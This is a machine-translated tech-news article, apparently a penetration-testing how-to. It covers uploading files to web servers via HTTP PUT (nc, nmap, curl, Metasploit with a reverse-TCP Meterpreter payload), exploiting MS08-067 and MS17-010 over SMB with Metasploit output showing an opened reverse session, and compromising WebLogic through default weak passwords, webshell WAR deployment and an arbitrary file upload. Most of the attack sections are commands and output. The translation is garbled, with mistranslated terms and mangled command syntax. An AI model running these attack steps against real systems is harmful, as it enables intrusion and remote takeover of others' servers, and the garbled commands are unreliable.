In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-07 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
In this issue, the editor will bring you an example analysis of the posture of Web vulnerability exploitation. the article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.
1. HTTP PUT method is used.
PUT is a method for file management. If the operator does not modify the default configuration of the Web server and still supports these methods, you can upload files to the server file system at will.
1.1.The Netcat uses the PUT method
Netcat is a very famous network tool, referred to as "NC", known as "Switzerland" in penetration testing. It can be used as port snooping, port scanning, remote file transfer, remote shell and other functions.
After learning that the PUT method is enabled by the Web service, enter the following command to upload the file:
Nc IP PORT
PUT / dav/hack.txt HTTP/1.1
Host: IP
Press enter twice to see that the hacked.txt file has been successfully created with a status code of 201 and the file creation location in the / dav/ directory.
1.2.The Nmap uses the PUT method
Command:
Nmap-p port IP-script http-put-script-args http-put.url='/dav/test.php',http-put.file='/root/test.php'
Command explanation:
-script http-put / / Select the http-put script, which supports uploading files using the http put method.
-script-args / / set script parameters 1 and 2
Http-put.url='/dav/test.php' / / set parameter 1 to upload the target file path
Http-put.file='/root/test.php' / / set parameter 2 to upload the local file path.
You can see in the figure that the upload is successful through the Nmap script.
1.3 BurpSuite uses the PUT method
Use the daily meeting BurpSuite access upload target path to grab the data packet, modify the packet request method and upload path, write the file content in the request body, and send the packet to the Web server.
The server response package shows that the file was created successfully.
1.4 CURL uses the PUT method
CURL is a file transfer tool that uses URL syntax to work on the command line, uploads or downloads data through a specified URL, and displays the data. The c in curl stands for client, and URL is URL.
The command to create a file through the PUT method is as follows:
Command 1:
Curl-I-XPUT-H "Content-Type: text/plain; charset=utf-8"-d "hack completed" http://192.168.40.4/dav/hack.php
Command explanation:
-i/--include / / include header information when outputting
-X/--request / / specify the PUT command
-H/--header / / Custom header information "Content-Type:text/plain; charset=utf-8" is passed to the server
-d/--data / / HTTP POST to write text to the created http://192.168.40.4/dav/hack.php
Command 2:
Curl-I-X PUT-H "Content-Type:application/xml; charset=utf-8"-d @ "F:\ 1.php" http://192.168.40.4/dav/hack.php
Command explanation:
-d @ "filename" / / read content from a file
1.5 QuickPuT script uses the PUT method
QuickPut is a Python command-line tool that allows you to upload files to the server through the HTTP PUT method.
Upload command:
Python2 QuickPut.py F:\ 1.php http://192.168.40.4/dav/hack1.php
Command explanation:
Python QuickPut.py
1.6 Metasploit uses PUT method
Auxiliary/scanner/http/http_put, the auxiliary module of Metasploit, can upload and delete files.
Command:
Use auxiliary/scanner/http/http_put / / use the http_put module
Show options / / display module parameters
Set RHOSTS 192.168.40.4 / / set the target IP
Set PATH / dav/ set the target path
Set payload php/meterpreter/reverse_tcp / / set attack payload
Set filename msf.php / / set the upload file name
Set FILEDATA file://root/test.php / / sets the data path for uploading local files
Exploit / / start the attack
The result returned shows that the file was uploaded successfully.
2.SMB vulnerability exploitation
After scanning the information collection port, it is found that the host opens port 139445 and the banner is displayed as Microsoft Windows, which will be associated with the SMB vulnerabilities of port 139,445, such as ms17-010, ms08-067, and so on.
Vulnerability detection
Command:
Namp-script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse-sTIP
Namp-script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse-sTIP
Command explanation:
-- script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse / / use the Nmapms08-067 vulnerability scan script
-sT / / scan with TCP
If the output result is:
Smb-vuln-ms08-067:
VULNERABLE:
Microsoft Windows system vulnerable toremote code execution (MS08-067)
State: VULNERABLE
IDs: CVE:CVE-2008-4250
The Server service inMicrosoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,Vista Goldand SP1, Server 2008, and 7 Pre-Beta allows remote attackers to executearbitrarycode via a crafted RPC request that triggers the overflow during pathcanonicalization.
Disclosure date: 2008-10-23
References:
Https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
Https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
Then it indicates that there is a ms08-067 vulnerability, and ms17-010 is the same as above.
Vulnerability exploitation
The MSF smb attack module is used to exploit the vulnerabilities of ms08-067 and ms17-010.
Msf > use exploit/windows/smb/ms08_067_netapi
Msfexploit (ms08_067_netapi) > set RHOST IP
Msfexploit (ms08_067_netapi) > exploit
[*] Started reverse TCP handler on snooping IP port locally
[*] Target IP:445- Automatically detecting the target...
[*] Target IP:445- Fingerprint: Windows 2000-Service Pack 0-4-lang:English
[*] Target IP:445- Selected Target: Windows 2000 Universal
[*] Target IP:445- Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to Target IP
[*] Meterpreter session 2 opened (listen on IP port-> destination port bounce)
Meterpreter >
The ms17-010 vulnerability is exploited as above.
3.Weblogic vulnerability exploitation
Weblogic Server application server is often encountered in penetration testing. After seeing Weblogic Server, it is thought that Weblogic Server may have many CVE vulnerabilities in this version, such as background management weak password, JAVA deserialization vulnerability, arbitrary file upload vulnerability and so on. Let's share the ways to exploit various vulnerabilities in Weblogic.
3.1 weak password for background login
Common Weblogic Server login weak passwords:
Weblogic/weblogic
Weblogic/weblogic1
Weblogic/weblogic10
Weblogic/weblogic123
If it exists, you can log in to the application server management backend and upload the webshellwar package.
Deploy the war package in the application server after upload
Malaysia can be accessed after uploading and deploying war package successfully.
3.2 JAVA deserialization vulnerability
CVE vulnerabilities can be detected directly with scripts, and then exploited by exp scripts based on the vulnerability code.
The Weblogic vulnerability detection script is powerful enough to detect a variety of CVE, manage background paths, SSRF, weak passwords, and support later extensions.
It can also be detected and exploited directly by using the Java deserialization exploit tool. Vulnerability tools provide vulnerability detection, command execution, file upload, batch inspection functions.
3.3 Weblogic arbitrary file upload vulnerability
The information is returned by blasting Weblogic.
Get the login password, service name and random character directory, and construct the upload POC to upload the test file.
Pass the following data under the / bea_wls_deployment_internal/DeploymentService path
The server returns the upload success and the absolute path of the file.
Display the contents of the uploaded file after accessing this uploaded file path
Http://IP/bea_wls_deployment_internal/shell.jsp
The above is the example of Web vulnerability exploitation posture shared by Xiaobian. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.